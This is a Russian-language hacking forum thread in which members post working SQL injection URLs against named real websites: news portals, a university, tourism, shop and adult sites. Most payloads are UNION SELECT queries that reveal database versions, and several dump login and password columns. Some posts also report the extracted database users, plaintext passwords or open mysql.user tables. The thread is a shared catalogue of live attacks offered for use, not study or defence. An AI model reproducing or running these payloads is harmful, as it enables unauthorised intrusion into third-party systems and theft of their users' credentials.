SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. moodoone

    moodoone Member

    Joined:
    21 Oct 2009
    Messages:
    144
    Likes Received:
    38
    Reputations:
    5
    Code:
    http://www.radioera.com.ua/aboutprog/?idArticle=-12+union+select+1,2,3,version%28%29,5,6,7,8,9,10--
    ТИЦ: 450
    Вывод в title
     
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://engr.oregonstate.edu/oregonstater/citation.php?id=290+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11
     
    _________________________
    3 people like this.
  3. FindeR

    FindeR Elder - Старейшина

    Joined:
    15 Nov 2006
    Messages:
    623
    Likes Received:
    138
    Reputations:
    20
    http://www.travelsecrets.com/traveldeals.html?category=Ho%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+--+

    5.0.51a-24+lenny4-log
    доступна mysql.users
    Но пасс хэша рутового подобрать не вышло.
     
    #13483 FindeR, 19 Dec 2010
    Last edited: 19 Dec 2010
    1 person likes this.
  4. Hack_ERR++

    Hack_ERR++ Member

    Joined:
    13 Aug 2009
    Messages:
    41
    Likes Received:
    9
    Reputations:
    0
    Code:
    http://www.diario3.com.ar/nota.php?id=-1433+union+select+1,2,concat_ws(0x20,us_id,us_user,us_pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+usuario--
     
  5. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    http://www.1soveti.ru/page.php?link=-44+union+select+1,group_concat(login,char(58),pass),3,4,5,6,7,8+from+user--
     
    _________________________
    3 people like this.
  6. FindeR

    FindeR Elder - Старейшина

    Joined:
    15 Nov 2006
    Messages:
    623
    Likes Received:
    138
    Reputations:
    20
    Порник, открыта mysql.user
    Code:
    http://www.mondolapdance.it/provincia.php?sP=PD%27+or+1=1+union+select+1,2,3,group_concat%28TABLE_SCHEMA,%27.%27,TABLE_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.TABLES+where+table_name+like+%27%user%%27+--+
    аналогично
    Code:
    http://www.annuaire.fille-exhibe.com/Youpornotube-info-1061+union+select+1,2,3,4,5,6,7,8,9,group_concat%28distinct%20table_name%20order%20by%20table_name%20desc%29,11,12,13,14,15,16,17,18,19,20,21,22+from+information_schema.tables+--+.php
     
  7. moodoone

    moodoone Member

    Joined:
    21 Oct 2009
    Messages:
    144
    Likes Received:
    38
    Reputations:
    5
    Code:
    http://www.dovidkalutsk.com.ua/news_view.php?id=-739+union+select+1,2,3,4,5,6,7,version%28%29,9,10,11,12+from+userlist--
     
  8. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.vard.si/slo/kontinent.php?id=4;select+version()::int,null,null,null,null,null,null,null,null,null,null,null+from+pg_user--
     
    _________________________
    4 people like this.
  9. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    http://www.blbg.org.sg/event_detail.php?id=96+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,version()),8,9,10,11,12,13,14,15,16,17,18,19,20+from+users--
     
  10. life_glider

    life_glider Member

    Joined:
    13 Apr 2010
    Messages:
    42
    Likes Received:
    25
    Reputations:
    33
    view-source:http://www.worldwalk.info/en/catalog/1135%20and%202=1%20union%20select%201000,version%28%29,3000,4000,5000,6000,7000,8000,9000,10000,11000,12000#/
     
  11. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Code:
    http://plugring.farmanager.com/category.php?cid=33+and+1=2+union+select+1,2,3,concat(version(),0x3a,database()),5,6+--+&l=ru
    5.0.77 : plugring
     
    1 person likes this.
  12. KREGI

    KREGI Banned

    Joined:
    9 Feb 2009
    Messages:
    42
    Likes Received:
    3
    Reputations:
    1
    ТИЦ 10
    PR 3


    Code:
    http://www.printeffect.ru/product.php?tp=1+and+2=0+union%20select%20concat_ws%280x3a,email,password%29+from+users
     
  13. Chest3r

    Chest3r New Member

    Joined:
    14 Nov 2009
    Messages:
    40
    Likes Received:
    4
    Reputations:
    4
    http://brainattack.ru/articles.php?a_id=-5+union+select+group_concat(u_login,0x3a,u_pass),2,3,4+from+tbl_brain_users--

    Пассы в открытом виде +WMZ :D
     
    2 people like this.
  14. ubi

    ubi Elder - Старейшина

    Joined:
    25 Dec 2009
    Messages:
    308
    Likes Received:
    76
    Reputations:
    19
    http://versaledreams.ru/index.php?id=7/**/union/**/select/**/1,2,3,4,5,6,7--
     
  15. HellFire

    HellFire Elder - Старейшина

    Joined:
    18 Jan 2009
    Messages:
    98
    Likes Received:
    78
    Reputations:
    40
    Всем испанский туризм пасаны:

    Code:
    http://www.alavaturismo.com/es/ficha.php?id=363-1.1+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31-- 
    Database Version: 4.1.11-Debian_4sarge8-log
    Database name: bd391578
    User name: [email protected]

    ...и биология:

    Code:
    http://www.everythingbio.com/glos/definition.php?ID=-1+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),3,4,5,6,7,8,9-- 
    Database Version: 5.0.83-log
    Database name: everythi_tables
    User name: [email protected]
     
    #13495 HellFire, 23 Dec 2010
    Last edited: 23 Dec 2010
    1 person likes this.
  16. FindeR

    FindeR Elder - Старейшина

    Joined:
    15 Nov 2006
    Messages:
    623
    Likes Received:
    138
    Reputations:
    20
    Code:
    http://l2.naturalbornkillers.it/index.php?action=show;type=quest;id=195+union+select+version%28%29+--+
    
    Вывод в title, там же стоит smf второй версии (чтоб не выискивать имена таблиц).
    Админ:
    Code:
    /// dell
    
     
    #13496 FindeR, 23 Dec 2010
    Last edited by a moderator: 23 Dec 2010
    1 person likes this.
  17. JohnnyBGoode

    JohnnyBGoode Member

    Joined:
    5 Oct 2010
    Messages:
    48
    Likes Received:
    11
    Reputations:
    5
    http://www.nds-sochi.ru/article.php?id=-23008+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5+--+

    5.0.90:[email protected]:b10270


    http://sensation.ntv.ru/archive.jsp?iid=71731+and+to_char(11)=to_char(1)||to_char(1)+--+
    http://sensation.ntv.ru/archive.jsp?iid=71731+and+to_char(11)=to_char(1)||to_char(0)+--+

    Тут blind oracle походу.Как дальше крутить хз
     
  18. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Code:
    http://wincmd.ru/user/1391063'+and+1=2+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7+--+'.html
    
    wincmd_feinx@localhost : 4.1.22-standard : wincmd_db

    Ы_ы
     
  19. BaleHoK

    BaleHoK Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    399
    Likes Received:
    21
    Reputations:
    10
    www.hardsextube.com/share.php?vid=-199646+or 1=0+UNION SELECT 1,file_priv,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 from mysql.user--

    AR 255 many many traff
     
    1 person likes this.
  20. FindeR

    FindeR Elder - Старейшина

    Joined:
    15 Nov 2006
    Messages:
    623
    Likes Received:
    138
    Reputations:
    20
    Code:
    http://www.kasting.ru/library/show_user_photo.php?photo_id=1175260000+union+select+1,2,3,version(),4+--+&uid=31853
    5.1.49-Max-log
    юзеры - u_main (log и pw - юзер и пасс). Всё в открытом виде, но генерятся сайтом.
    На поддомене датинг висит, тоже покопать можно - http://love.kasting.ru
     
Thread Status:
Not open for further replies.